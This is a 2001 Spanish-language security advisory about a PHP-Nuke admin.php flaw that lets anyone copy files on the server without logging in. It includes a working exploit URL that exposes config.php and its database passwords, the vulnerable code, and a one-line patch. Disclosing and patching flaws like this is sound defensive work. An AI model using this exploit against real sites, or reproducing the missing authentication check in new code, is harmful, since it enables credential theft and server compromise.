Derecho informáticos derecho nuevas tecnologías
artículos estafas fraudes Servicio legal derecho informático nuevas tecnologías asesoría problemas legislación
Derecho informáticos derecho nuevas tecnologías
Derecho informáticos derecho nuevas tecnologías
 Artículos de Actualidad
  • Vulnerabilidad en el PHP-Nuke Permite Copiar Archivos (admin.php) [01-10-01]  




    PHP-Nuke es un portal de páginas web que coree en multitud de sitios web en la red. Un fallo en este producto paermite a los atacantes copiar archivos desde y hacia cualquier parte del disco duro del ordenador que está corriendo la web (lo cual permite sobreescribir archivos importantes). Este fallo puede causar el fallo total del sistema e incluso el acceso delatacante a información confidencial.


    Detalles
    Sistemas vulnerables:
    PHP-Nuke 5.2 y anteriores

    Systemas no vulnerables:
    PHP-Nuke 5.0 RC1

    Exploit:
    Primero escribe esta URL:
    http://www.ejemplo.net/admin.php?upload=1&file=config.php&file_name=hacked.txt&wdir=/images/&userfile=config.php&userfile_name=hacked.txt

    Despues accede al archivo creado:
    http://www.ejemplo.net/images/hacked.txt

    Y verás el config.php que contiene los passwords DB . Cualquier otro archivo puede ser copiado con la misma facilidad.

    Código causante del fallo:
    El admin.php contiene la siguiente rutina:

    $basedir = dirname($SCRIPT_FILENAME);
    $textrows = 20;
    $textcols = 85;
    $udir = dirname($PHP_SELF);
    if(!$wdir) $wdir="/";
    if($cancel) $op="FileManager";
    if($upload) {
    copy($userfile,$basedir.$wdir.$userfile_name);
    $lastaction = ""._UPLOADED." $userfile_name --> $wdir";
    // This need a rewrite -------------------------------------> Aquí está el problema: "Esto necesita volver a escribirse"
    //include("header.php");
    //GraphicAdmin($hlpfile);
    //html_header();
    //displaydir();
    $wdir2="/";
    chdir($basedir . $wdir2);
    //CloseTable();
    //include("footer.php");
    Header("Location: admin.php?op=FileManager");
    exit;
    }

    Esto no comprueba si has entrado como admin o no, Por lo tanto puedes usarlo sin autentificación.

    Solucion:
    A temporary solution would be to change:
    "if($upload) {"

    To

    "if (($upload) && ($admintest)) {"


    Información Adicional
    La información a sido suministrada por supergate yLucisfero de./twlc. El trabajo ha sido sugerido por Magnus Skjegstad. Toda la noticia está disponible en: http://www.twlc.net/article.php?sid=421.


    http://team-tribal.cjb.net



    Artículos de actualidad ...
    Archivo de artículos ...
    •  
    Campaña Stop Pedofilia
    Gratis Servicio de noticias
    Suscribir Borrado
    Tus Sugerencias son bienvenidas
    Pincha Aquí
    ¡¡Lista de correo!!
    Introduzca su correo:




    www.delitosinformaticos.com . mailto:webmaster@delitosinformaticos.com . Delitosinformáticos

    © Copyright 2000-2002 Delitosinformaticos.com -.